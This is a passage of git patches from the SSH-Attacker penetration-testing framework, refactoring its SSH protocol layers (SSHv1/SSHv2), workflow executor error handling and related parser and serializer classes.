SSL2ClientHelloMessage(); + break; + case SSL_CLIENT_MASTER_KEY: + message = new SSL2ClientMasterKeyMessage(); + break; + case SSL_SERVER_VERIFY: + message = new SSL2ServerVerifyMessage(); + break; + case SSL_SERVER_HELLO: + message = new SSL2ServerHelloMessage(); + break; + default: + message = new UnknownSSL2Message(); + } + + message.setType((byte) messageType.getType()); + message.setMessageLength(messageLength); + message.setPaddingLength((int) paddingLength); + readDataContainer(message, context); + + } catch (TimeoutException ex) { + LOGGER.debug(ex); + } catch (EndOfStreamException ex) { + LOGGER.debug("Reached end of stream, cannot parse more messages", ex); + } + + return getLayerResult();*/ + return null; + } + + /*private static int resolvePaddedMessageLength(final byte[] totalHeaderLength) { + return (totalHeaderLength[0] & SSL2TotalHeaderLengths.ALL_BUT_TWO_BIT.getValue()) << 8 + | totalHeaderLength[1]; + } + + private static int resolveUnpaddedMessageLength(final byte[] totalHeaderLength) { + return (totalHeaderLength[0] & SSL2TotalHeaderLengths.ALL_BUT_ONE_BIT.getValue()) << 8 + | totalHeaderLength[1]; + }*/ + + @Override + public void receiveMoreDataForHint(LayerProcessingHint hint) throws IOException { + try { + HintedInputStream dataStream = null; + dataStream = getLowerLayer().getDataStream(); + if (dataStream.getHint() == null) { + LOGGER.warn( + "The DTLS fragment layer requires a processing hint. E.g. a record type. Parsing as an unknown fragment"); + currentInputStream = new HintedLayerInputStream(null, this); + currentInputStream.extendStream(dataStream.readAllBytes()); + } else if (dataStream.getHint() instanceof RecordLayerHint) { + RecordLayerHint tempHint = (RecordLayerHint) dataStream.getHint(); + /*if (tempHint.getType() == ProtocolMessageType.HANDSHAKE) { + DtlsHandshakeMessageFragment fragment = new DtlsHandshakeMessageFragment(); + fragment.setEpoch(tempHint.getEpoch()); + DtlsHandshakeMessageFragmentParser parser = + fragment.getParser( + context, + new ByteArrayInputStream( + dataStream.readChunk(dataStream.available()))); + parser.parse(fragment); + fragment.setCompleteResultingMessage( + fragment.getSerializer(context).serialize()); + fragmentManager.addMessageFragment(fragment); + List uninterpretedMessageFragments = + fragmentManager.getOrderedCombinedUninterpretedMessageFragments( + true, false); + // run until we received a complete fragment + if (!uninterpretedMessageFragments.isEmpty()) { + DtlsHandshakeMessageFragment uninterpretedMessageFragment = + uninterpretedMessageFragments.get(0); + addProducedContainer(uninterpretedMessageFragment); + RecordLayerHint currentHint = + new RecordLayerHint( + uninterpretedMessageFragment.getProtocolMessageType(), + uninterpretedMessageFragment + .getMessageSequence() + .getValue()); + byte type = uninterpretedMessageFragment.getType().getValue(); + byte[] content = + uninterpretedMessageFragment.getMessageContent().getValue(); + byte[] message = + ArrayConverter.concatenate( + new byte[] {type}, + ArrayConverter.intToBytes( + content.length, + HandshakeByteLength.MESSAGE_LENGTH_FIELD), + content); + if (desiredHint == null || currentHint.equals(desiredHint)) { + if (currentInputStream == null) { + currentInputStream = new HintedLayerInputStream(currentHint, this); + } else { + currentInputStream.setHint(currentHint); + } + currentInputStream.extendStream(message); + } else { + if (nextInputStream == null) { + nextInputStream = new HintedLayerInputStream(currentHint, this); + } else { + nextInputStream.setHint(currentHint); + } + nextInputStream.extendStream(message); + } + } else { + receiveMoreDataForHint(desiredHint); + } + } else { + currentInputStream = new HintedLayerInputStream(tempHint, this); + currentInputStream.extendStream(dataStream.readChunk(dataStream.available())); + }*/ + } + } catch (TimeoutException ex) { + LOGGER.debug(ex); + throw ex; + } catch (EndOfStreamException ex) { + LOGGER.debug("Reached end of stream, cannot parse more dtls fragments", ex); + throw ex; + } + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/MessageAction.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/MessageAction.java index 445209793..ac39d817e 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/MessageAction.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/MessageAction.java @@ -280,35 +280,39 @@ protected void send( throws IOException { LayerStack layerStack = sshContext.getLayerStack(); - LayerConfiguration authenticationConfiguration = + LayerConfiguration ssh2Configuration = new SpecificSendLayerConfiguration<>( - ImplementedLayers.AuthenticationLayer, protocolMessagesToSend); - LayerConfiguration transportConfiguration = + ImplementedLayers.SSHv2, protocolMessagesToSend); + LayerConfiguration ssh1Configuration = new SpecificSendLayerConfiguration<>( - ImplementedLayers.TransportLayer, protocolMessagesToSend); - LayerConfiguration connectionConfiguration = - new SpecificSendLayerConfiguration<>( - ImplementedLayers.ConnectionLayer, protocolMessagesToSend); + ImplementedLayers.SSHv1, protocolMessagesToSend); LayerConfiguration sessionConfiguration = new SpecificSendLayerConfiguration<>(ImplementedLayers.Session, sessionsToSend); List layerConfigurationList = sortLayerConfigurations( layerStack, - authenticationConfiguration, - transportConfiguration, - connectionConfiguration, + ssh2Configuration, + ssh1Configuration, sessionConfiguration); LayerStackProcessingResult processingResult = layerStack.sendData(layerConfigurationList); setContainers(processingResult); } private void setContainers(LayerStackProcessingResult processingResults) { - if (processingResults.getResultForLayer(ImplementedLayers.AuthenticationLayer) != null) { + if (processingResults.getResultForLayer(ImplementedLayers.SSHv2) != null) { + messages = + new ArrayList<>( + processingResults + .getResultForLayer(ImplementedLayers.SSHv2) + .getUsedContainers()); + } + + if (processingResults.getResultForLayer(ImplementedLayers.SSHv1) != null) { messages = new ArrayList<>( processingResults - .getResultForLayer(ImplementedLayers.AuthenticationLayer) + .getResultForLayer(ImplementedLayers.SSHv1) .getUsedContainers()); } @@ -341,12 +345,14 @@ protected void receive( private List getGenericReceiveConfigurations(LayerStack layerStack) { List layerConfigurationList; - LayerConfiguration messageConfiguration = - new GenericReceiveLayerConfiguration(ImplementedLayers.AuthenticationLayer); + LayerConfiguration messageSsh2Configuration = + new GenericReceiveLayerConfiguration(ImplementedLayers.SSHv2); + LayerConfiguration messageSsh1Configuration = + new GenericReceiveLayerConfiguration(ImplementedLayers.SSHv1); LayerConfiguration recordConfiguration = new GenericReceiveLayerConfiguration(ImplementedLayers.Session); layerConfigurationList = - sortLayerConfigurations(layerStack, messageConfiguration, recordConfiguration); + sortLayerConfigurations(layerStack,messageSsh2Configuration, messageSsh1Configuration, recordConfiguration); return layerConfigurationList; } @@ -356,9 +362,12 @@ private List getSpecificReceiveConfigurations( LayerStack layerStack) { List layerConfigurationList; - LayerConfiguration messageConfiguration = + LayerConfiguration messageSsh2Configuration = + new SpecificReceiveLayerConfiguration<>( + ImplementedLayers.SSHv2, protocolMessagesToReceive); + LayerConfiguration messageSsh1Configuration = new SpecificReceiveLayerConfiguration<>( - ImplementedLayers.AuthenticationLayer, protocolMessagesToReceive); + ImplementedLayers.SSHv1, protocolMessagesToReceive); LayerConfiguration recordConfiguration = new SpecificReceiveLayerConfiguration<>( ImplementedLayers.Session, sessionsToReceive); @@ -371,9 +380,10 @@ private List getSpecificReceiveConfigurations( /* LayerConfiguration httpConfiguration = new SpecificReceiveLayerConfiguration<>( ImplementedLayers.HTTP, httpMessagesToReceive);*/ - applyActionOptionFilters(messageConfiguration); + applyActionOptionFilters(messageSsh1Configuration); + applyActionOptionFilters(messageSsh2Configuration); layerConfigurationList = - sortLayerConfigurations(layerStack, messageConfiguration, recordConfiguration); + sortLayerConfigurations(layerStack,messageSsh2Configuration, messageSsh1Configuration, recordConfiguration); return layerConfigurationList; } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/SshAction.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/SshAction.java index 68449d86b..9c89fd7b5 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/SshAction.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/SshAction.java @@ -165,9 +165,7 @@ public List sortLayerConfigurations( } Optional layerConfiguration = Optional.empty(); if (layer == ImplementedLayers.SSHv1 - || layer == ImplementedLayers.AuthenticationLayer - || layer == ImplementedLayers.TransportLayer - || layer == ImplementedLayers.ConnectionLayer + || layer == ImplementedLayers.SSHv2 || layer == ImplementedLayers.Session) { layerConfiguration = unsortedLayerConfigurations.stream() From fc46514a57f501a5e761b931c18737c7cbb631ca Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Steffen=20Bro=C3=9Fler?= Date: Mon, 29 May 2023 17:07:48 +0200 Subject: [PATCH 005/176] minor reformatting --- .../sshattacker/core/layer/impl/SSH2Layer.java | 3 +-- .../core/workflow/action/MessageAction.java | 17 +++++++++++------ 2 files changed, 12 insertions(+), 8 deletions(-) diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java index 0fcc4fc56..7b7e8c5db 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java @@ -30,11 +30,10 @@ import de.rub.nds.sshattacker.core.layer.stream.HintedInputStream; import de.rub.nds.sshattacker.core.layer.stream.HintedLayerInputStream; import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessage; +import java.io.IOException; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; -import java.io.IOException; - public class SSH2Layer extends ProtocolLayer { private static final Logger LOGGER = LogManager.getLogger(); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/MessageAction.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/MessageAction.java index ac39d817e..e034f1ed5 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/MessageAction.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/MessageAction.java @@ -291,10 +291,7 @@ protected void send( List layerConfigurationList = sortLayerConfigurations( - layerStack, - ssh2Configuration, - ssh1Configuration, - sessionConfiguration); + layerStack, ssh2Configuration, ssh1Configuration, sessionConfiguration); LayerStackProcessingResult processingResult = layerStack.sendData(layerConfigurationList); setContainers(processingResult); } @@ -352,7 +349,11 @@ private List getGenericReceiveConfigurations(LayerStack laye LayerConfiguration recordConfiguration = new GenericReceiveLayerConfiguration(ImplementedLayers.Session); layerConfigurationList = - sortLayerConfigurations(layerStack,messageSsh2Configuration, messageSsh1Configuration, recordConfiguration); + sortLayerConfigurations( + layerStack, + messageSsh2Configuration, + messageSsh1Configuration, + recordConfiguration); return layerConfigurationList; } @@ -383,7 +384,11 @@ private List getSpecificReceiveConfigurations( applyActionOptionFilters(messageSsh1Configuration); applyActionOptionFilters(messageSsh2Configuration); layerConfigurationList = - sortLayerConfigurations(layerStack,messageSsh2Configuration, messageSsh1Configuration, recordConfiguration); + sortLayerConfigurations( + layerStack, + messageSsh2Configuration, + messageSsh1Configuration, + recordConfiguration); return layerConfigurationList; } From c78eb2e365f3db0646d47003b42323e7c8dd1a82 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Steffen=20Bro=C3=9Fler?= Date: Wed, 31 May 2023 22:19:28 +0200 Subject: [PATCH 006/176] Fitting Executor to new layer model --- .idea/misc.xml | 2 +- .../exceptions/ActionExecutionException.java | 22 ++++++++ .../core/exceptions/SkipActionException.java | 34 +++++++++++++ .../WorkflowExecutionException.java | 3 ++ .../rub/nds/sshattacker/core/state/State.java | 33 +++++++++++- .../workflow/DefaultWorkflowExecutor.java | 51 ++++++++++++++----- .../core/workflow/WorkflowExecutor.java | 13 +++++ 7 files changed, 143 insertions(+), 15 deletions(-) create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/exceptions/ActionExecutionException.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/exceptions/SkipActionException.java diff --git a/.idea/misc.xml b/.idea/misc.xml index 45478c708..d31b37ac7 100644 --- a/.idea/misc.xml +++ b/.idea/misc.xml @@ -8,5 +8,5 @@ - + \ No newline at end of file diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/exceptions/ActionExecutionException.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/exceptions/ActionExecutionException.java new file mode 100644 index 000000000..9c2b64e27 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/exceptions/ActionExecutionException.java @@ -0,0 +1,22 @@ +/* + * TLS-Attacker - A Modular Penetration Testing Framework for TLS + * + * Copyright 2014-2023 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License, Version 2.0 + * http://www.apache.org/licenses/LICENSE-2.0.txt + */ +package de.rub.nds.sshattacker.core.exceptions; + +public class ActionExecutionException extends RuntimeException { + + public ActionExecutionException() {} + + public ActionExecutionException(String message) { + super(message); + } + + public ActionExecutionException(String message, Throwable cause) { + super(message, cause); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/exceptions/SkipActionException.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/exceptions/SkipActionException.java new file mode 100644 index 000000000..aa2b3fb99 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/exceptions/SkipActionException.java @@ -0,0 +1,34 @@ +/* + * TLS-Attacker - A Modular Penetration Testing Framework for TLS + * + * Copyright 2014-2023 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License, Version 2.0 + * http://www.apache.org/licenses/LICENSE-2.0.txt + */ +package de.rub.nds.sshattacker.core.exceptions; + +public class SkipActionException extends RuntimeException { + + public SkipActionException() {} + + public SkipActionException(String message) { + super(message); + } + + public SkipActionException(String message, Throwable cause) { + super(message, cause); + } + + public SkipActionException(Throwable cause) { + super(cause); + } + + public SkipActionException( + String message, + Throwable cause, + boolean enableSuppression, + boolean writableStackTrace) { + super(message, cause, enableSuppression, writableStackTrace); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/exceptions/WorkflowExecutionException.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/exceptions/WorkflowExecutionException.java index c94e6d458..c4a24e8c0 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/exceptions/WorkflowExecutionException.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/exceptions/WorkflowExecutionException.java @@ -21,4 +21,7 @@ public WorkflowExecutionException(String message) { public WorkflowExecutionException(String message, Throwable t) { super(message, t); } + public WorkflowExecutionException(Throwable throwable) { + super(throwable); + } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/state/State.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/state/State.java index 7df0a5d45..54a00502f 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/state/State.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/state/State.java @@ -57,6 +57,37 @@ public class State { private final Config config; private RunningModeType runningMode; + + public long getStartTimestamp() { + return startTimestamp; + } + + public void setStartTimestamp(long startTimestamp) { + this.startTimestamp = startTimestamp; + } + + private long startTimestamp; + + public long getEndTimestamp() { + return endTimestamp; + } + + public void setEndTimestamp(long endTimestamp) { + this.endTimestamp = endTimestamp; + } + + private long endTimestamp; + + public Throwable getExecutionException() { + return executionException; + } + + public void setExecutionException(Throwable executionException) { + this.executionException = executionException; + } + + private Throwable executionException; + @HoldsModifiableVariable private WorkflowTrace workflowTrace; private WorkflowTrace originalWorkflowTrace; @@ -158,7 +189,7 @@ public WorkflowTrace getOriginalWorkflowTrace() { * Replace existing SshContext with new SshContext. This can only be done if * existingSshContext.connection equals newSshContext.connection. * - * @param Context The new SshContext to replace the old with + * @param newContext The new SshContext to replace the old with */ public void replaceContext(Context newContext) { contextContainer.replaceContext(newContext); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/DefaultWorkflowExecutor.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/DefaultWorkflowExecutor.java index 1bc6a60e4..84ebf4f06 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/DefaultWorkflowExecutor.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/DefaultWorkflowExecutor.java @@ -8,7 +8,9 @@ package de.rub.nds.sshattacker.core.workflow; import de.rub.nds.sshattacker.core.config.ConfigIO; +import de.rub.nds.sshattacker.core.exceptions.ActionExecutionException; import de.rub.nds.sshattacker.core.exceptions.PreparationException; +import de.rub.nds.sshattacker.core.exceptions.SkipActionException; import de.rub.nds.sshattacker.core.exceptions.WorkflowExecutionException; import de.rub.nds.sshattacker.core.state.Context; import de.rub.nds.sshattacker.core.state.State; @@ -40,6 +42,7 @@ public void executeWorkflow() throws WorkflowExecutionException { } state.getWorkflowTrace().reset(); + state.setStartTimestamp(System.currentTimeMillis()); List sshActions = state.getWorkflowTrace().getSshActions(); for (SshAction action : sshActions) { @@ -56,7 +59,8 @@ && isDisconnectMessageReceived())) { } try { - action.execute(state); + this.executeAction(action, state); + // TODO: Implement feature to check if message was received as expected. // We should accept unexpected messages to keep going in case something // unexpected happens. @@ -67,18 +71,16 @@ && isDisconnectMessageReceived())) { } } - /* if (state.getConfig().getWorkflowExecutorShouldClose()) { - state.getAllSshContexts() - .forEach( - ctx -> { - try { - ctx.getTransportHandler().closeConnection(); - } catch (IOException ex) { - LOGGER.warn("Could not close connection for context " + ctx); - LOGGER.debug(ex); - } - }); - }*/ + if (config.getWorkflowExecutorShouldClose()) { + closeConnection(); + } + + if (state.getWorkflowTrace().executedAsPlanned()) { + LOGGER.info("Workflow executed as planned."); + } else { + LOGGER.info("Workflow was not executed as planned."); + } + if (state.getConfig().getResetWorkflowtracesBeforeSaving()) { state.getWorkflowTrace().reset(); @@ -90,6 +92,29 @@ && isDisconnectMessageReceived())) { } } + protected void executeAction(SshAction action, State state) throws SkipActionException { + try { + action.execute(state); + } catch (WorkflowExecutionException ex) { + LOGGER.error("Fatal error during action execution, stopping execution: ", ex); + state.setExecutionException(ex); + throw ex; + } catch (UnsupportedOperationException + | PreparationException + | ActionExecutionException ex) { + state.setExecutionException(ex); + LOGGER.warn("Not fatal error during action execution, skipping action: " + action, ex); + throw new SkipActionException(ex); + } catch (Exception ex) { + LOGGER.error( + "Unexpected fatal error during action execution, stopping execution: ", ex); + state.setExecutionException(ex); + throw new WorkflowExecutionException(ex); + } finally { + state.setEndTimestamp(System.currentTimeMillis()); + } + } + private boolean isDisconnectMessageReceived() { for (Context context : state.getAllContexts()) { if (context.getSshContext().isDisconnectMessageReceived()) { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/WorkflowExecutor.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/WorkflowExecutor.java index c79dfc1fb..3cfebdfba 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/WorkflowExecutor.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/WorkflowExecutor.java @@ -29,6 +29,7 @@ public abstract class WorkflowExecutor { protected final State state; protected final Config config; + private Function beforeTransportPreInitCallback = null; private Function beforeTransportInitCallback = null; @@ -117,6 +118,8 @@ public void initTransportHandler(Context context) { }*/ } + + try { if (getBeforeTransportPreInitCallback() != null) { getBeforeTransportPreInitCallback().apply(state); @@ -139,4 +142,14 @@ public void initTransportHandler(Context context) { ex); } } + public void closeConnection() { + for (Context context : state.getAllContexts()) { + try { + context.getTransportHandler().closeConnection(); + } catch (IOException ex) { + LOGGER.warn("Could not close connection for context " + context); + LOGGER.debug(ex); + } + } + } } From 8706ca98aba91ed0863035bb88e316b6045c2158 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Steffen=20Bro=C3=9Fler?= Date: Sat, 3 Jun 2023 00:36:37 +0200 Subject: [PATCH 007/176] Fixing Parser and Serializier to fit into the new layer-System --- .../nds/sshattacker/core/config/Config.java | 12 + .../core/constants/ProtocolMessageType.java | 6 +- .../exceptions/ActionExecutionException.java | 5 +- .../core/exceptions/SkipActionException.java | 5 +- .../WorkflowExecutionException.java | 1 + .../core/layer/context/SshContext.java | 10 + .../core/layer/impl/AuthenticationLayer.java | 229 ----------------- .../core/layer/impl/ConnectionLayer.java | 229 ----------------- .../core/layer/impl/SSH2Layer.java | 243 +++++++++++++++++- .../handler/AuthenticationMessageHandler.java | 38 +++ .../handler/ConnectionMessageHandler.java | 38 +++ .../UserAuthHostbasedMessageHandler.java | 2 +- .../UserAuthSuccessMessageHandler.java | 8 +- .../message/AuthenticationMessage.java | 129 ++++++++++ .../parser/AuthenticationMessageParser.java | 45 ++++ .../parser/UserAuthBannerMessageParser.java | 20 +- .../parser/UserAuthFailureMessageParser.java | 22 +- .../UserAuthHostbasedMessageParser.java | 36 +-- .../UserAuthInfoRequestMessageParser.java | 30 ++- .../UserAuthInfoResponseMessageParser.java | 18 +- ...rAuthKeyboardInteractiveMessageParser.java | 24 +- .../parser/UserAuthNoneMessageParser.java | 16 +- .../parser/UserAuthPasswordMessageParser.java | 28 +- .../parser/UserAuthPkOkMessageParser.java | 22 +- .../parser/UserAuthPubkeyMessageParser.java | 32 +-- .../parser/UserAuthRequestMessageParser.java | 14 +- .../parser/UserAuthSuccessMessageParser.java | 14 +- .../parser/UserAuthUnknownMessageParser.java | 20 +- .../AuthenticationMessagePreparator.java | 41 +++ .../AuthenticationMessageSerializer.java | 41 +++ .../UserAuthBannerMessageSerializer.java | 6 + .../UserAuthFailureMessageSerializer.java | 6 + .../UserAuthInfoRequestMessageSerializer.java | 6 + ...UserAuthInfoResponseMessageSerializer.java | 6 + .../UserAuthRequestMessageSerializer.java | 6 + .../UserAuthSuccessMessageSerializer.java | 6 + .../core/protocol/common/ProtocolMessage.java | 12 + .../common/ProtocolMessageHandler.java | 9 +- .../common/ProtocolMessageParser.java | 11 +- .../common/ProtocolMessageSerializer.java | 6 +- .../protocol/common/SshMessageParser.java | 11 +- .../protocol/common/SshMessageSerializer.java | 2 +- .../handler/ChannelCloseMessageHandler.java | 4 +- ...ChannelOpenConfirmationMessageHandler.java | 6 +- .../ChannelOpenFailureMessageHandler.java | 4 +- ...ChannelRequestAuthAgentMessageHandler.java | 2 +- .../ChannelRequestBreakMessageHandler.java | 2 +- .../ChannelRequestEnvMessageHandler.java | 2 +- .../ChannelRequestExecMessageHandler.java | 2 +- ...hannelRequestExitSignalMessageHandler.java | 2 +- ...hannelRequestExitStatusMessageHandler.java | 2 +- .../ChannelRequestPtyMessageHandler.java | 2 +- .../ChannelRequestShellMessageHandler.java | 2 +- .../ChannelRequestSignalMessageHandler.java | 2 +- ...ChannelRequestSubsystemMessageHandler.java | 2 +- .../ChannelRequestUnknownMessageHandler.java | 2 +- ...nnelRequestWindowChangeMessageHandler.java | 2 +- .../ChannelRequestX11MessageHandler.java | 2 +- .../ChannelRequestXonXoffMessageHandler.java | 2 +- .../ChannelWindowAdjustMessageHandler.java | 6 +- .../connection/message/ConnectionMessage.java | 129 ++++++++++ .../parser/ChannelCloseMessageParser.java | 6 +- .../parser/ChannelDataMessageParser.java | 20 +- .../parser/ChannelEofMessageParser.java | 6 +- .../ChannelExtendedDataMessageParser.java | 24 +- .../parser/ChannelFailureMessageParser.java | 6 +- .../parser/ChannelMessageParser.java | 6 +- .../ChannelOpenConfirmationMessageParser.java | 28 +- .../ChannelOpenFailureMessageParser.java | 28 +- .../parser/ChannelOpenMessageParser.java | 18 +- .../ChannelOpenSessionMessageParser.java | 6 +- .../ChannelOpenUnknownMessageParser.java | 14 +- .../ChannelRequestAuthAgentMessageParser.java | 6 +- .../ChannelRequestBreakMessageParser.java | 20 +- .../ChannelRequestEnvMessageParser.java | 24 +- .../ChannelRequestExecMessageParser.java | 20 +- ...ChannelRequestExitSignalMessageParser.java | 32 +-- ...ChannelRequestExitStatusMessageParser.java | 14 +- .../parser/ChannelRequestMessageParser.java | 12 +- .../ChannelRequestPtyMessageParser.java | 40 +-- .../ChannelRequestShellMessageParser.java | 6 +- .../ChannelRequestSignalMessageParser.java | 20 +- .../ChannelRequestSubsystemMessageParser.java | 20 +- .../ChannelRequestUnknownMessageParser.java | 20 +- ...annelRequestWindowChangeMessageParser.java | 32 +-- .../ChannelRequestX11MessageParser.java | 32 +-- .../ChannelRequestXonXoffMessageParser.java | 20 +- .../parser/ChannelSuccessMessageParser.java | 6 +- .../ChannelWindowAdjustMessageParser.java | 20 +- .../parser/ConnectionMessageParser.java | 45 ++++ ...equestCancelTcpIpForwardMessageParser.java | 18 +- .../GlobalRequestFailureMessageParser.java | 14 +- .../parser/GlobalRequestMessageParser.java | 10 +- ...balRequestNoMoreSessionsMessageParser.java | 16 +- ...alRequestOpenSshHostKeysMessageParser.java | 20 +- .../GlobalRequestSuccessMessageParser.java | 14 +- ...lobalRequestTcpIpForwardMessageParser.java | 24 +- .../GlobalRequestUnknownMessageParser.java | 14 +- .../ConnectionMessagePreparator.java | 40 +++ .../serializer/ChannelMessageSerializer.java | 6 + .../ChannelOpenMessageSerializer.java | 6 + .../ConnectionMessageSerializer.java | 40 +++ ...GlobalRequestFailureMessageSerializer.java | 6 + .../GlobalRequestMessageSerializer.java | 6 + ...GlobalRequestSuccessMessageSerializer.java | 6 + .../DhGexKeyExchangeGroupMessageHandler.java | 4 +- .../DhGexKeyExchangeInitMessageHandler.java | 6 +- ...exKeyExchangeOldRequestMessageHandler.java | 7 +- .../DhGexKeyExchangeReplyMessageHandler.java | 19 +- ...DhGexKeyExchangeRequestMessageHandler.java | 10 +- .../DhKeyExchangeInitMessageHandler.java | 6 +- .../DhKeyExchangeReplyMessageHandler.java | 18 +- .../handler/DisconnectMessageHandler.java | 2 +- .../EcdhKeyExchangeInitMessageHandler.java | 6 +- .../EcdhKeyExchangeReplyMessageHandler.java | 19 +- .../HybridKeyExchangeInitMessageHandler.java | 12 +- .../HybridKeyExchangeReplyMessageHandler.java | 34 +-- .../KeyExchangeInitMessageHandler.java | 120 +++++---- .../handler/NewKeysMessageHandler.java | 36 +-- .../RsaKeyExchangeDoneMessageHandler.java | 8 +- .../RsaKeyExchangePubkeyMessageHandler.java | 9 +- .../RsaKeyExchangeSecretMessageHandler.java | 8 +- .../VersionExchangeMessageHandler.java | 14 +- .../transport/parser/AsciiMessageParser.java | 14 +- .../transport/parser/DebugMessageParser.java | 20 +- .../DhGexKeyExchangeGroupMessageParser.java | 16 +- .../DhGexKeyExchangeInitMessageParser.java | 12 +- ...GexKeyExchangeOldRequestMessageParser.java | 12 +- .../DhGexKeyExchangeReplyMessageParser.java | 20 +- .../DhGexKeyExchangeRequestMessageParser.java | 26 +- .../DhKeyExchangeInitMessageParser.java | 12 +- .../DhKeyExchangeReplyMessageParser.java | 26 +- .../parser/DisconnectMessageParser.java | 26 +- .../EcdhKeyExchangeInitMessageParser.java | 12 +- .../EcdhKeyExchangeReplyMessageParser.java | 26 +- .../HybridKeyExchangeInitMessageParser.java | 18 +- .../HybridKeyExchangeReplyMessageParser.java | 26 +- .../transport/parser/IgnoreMessageParser.java | 18 +- .../parser/KeyExchangeInitMessageParser.java | 66 ++--- .../parser/NewKeysMessageParser.java | 14 +- .../RsaKeyExchangeDoneMessageParser.java | 18 +- .../RsaKeyExchangePubkeyMessageParser.java | 22 +- .../RsaKeyExchangeSecretMessageParser.java | 12 +- .../parser/ServiceAcceptMessageParser.java | 18 +- .../parser/ServiceRequestMessageParser.java | 12 +- .../parser/UnimplementedMessageParser.java | 18 +- .../parser/UnknownMessageParser.java | 14 +- .../parser/VersionExchangeMessageParser.java | 14 +- .../serializer/AsciiMessageSerializer.java | 8 +- .../serializer/DebugMessageSerializer.java | 6 + ...hGexKeyExchangeGroupMessageSerializer.java | 6 + ...DhGexKeyExchangeInitMessageSerializer.java | 6 + ...eyExchangeOldRequestMessageSerializer.java | 6 + ...hGexKeyExchangeReplyMessageSerializer.java | 6 + ...exKeyExchangeRequestMessageSerializer.java | 6 + .../DhKeyExchangeInitMessageSerializer.java | 6 + .../DhKeyExchangeReplyMessageSerializer.java | 6 + .../DisconnectMessageSerializer.java | 6 + .../EcdhKeyExchangeInitMessageSerializer.java | 6 + ...EcdhKeyExchangeReplyMessageSerializer.java | 6 + ...ybridKeyExchangeInitMessageSerializer.java | 6 + ...bridKeyExchangeReplyMessageSerializer.java | 6 + .../serializer/IgnoreMessageSerializer.java | 6 + .../KeyExchangeInitMessageSerializer.java | 6 + .../serializer/NewKeysMessageSerializer.java | 6 + .../RsaKeyExchangeDoneMessageSerializer.java | 6 + ...RsaKeyExchangePubkeyMessageSerializer.java | 6 + ...RsaKeyExchangeSecretMessageSerializer.java | 6 + .../ServiceAcceptMessageSerializer.java | 6 + .../ServiceRequestMessageSerializer.java | 6 + .../UnimplementedMessageSerializer.java | 6 + .../serializer/UnknownMessageSerializer.java | 6 + .../VersionExchangeMessageSerializer.java | 8 +- .../rub/nds/sshattacker/core/state/State.java | 1 - .../workflow/DefaultWorkflowExecutor.java | 5 +- .../core/workflow/WorkflowExecutor.java | 3 +- .../core/workflow/chooser/Chooser.java | 4 + .../core/workflow/chooser/DefaultChooser.java | 22 ++ 178 files changed, 2109 insertions(+), 1343 deletions(-) delete mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/AuthenticationLayer.java delete mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/ConnectionLayer.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/handler/AuthenticationMessageHandler.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/handler/ConnectionMessageHandler.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/AuthenticationMessage.java create mode 100644 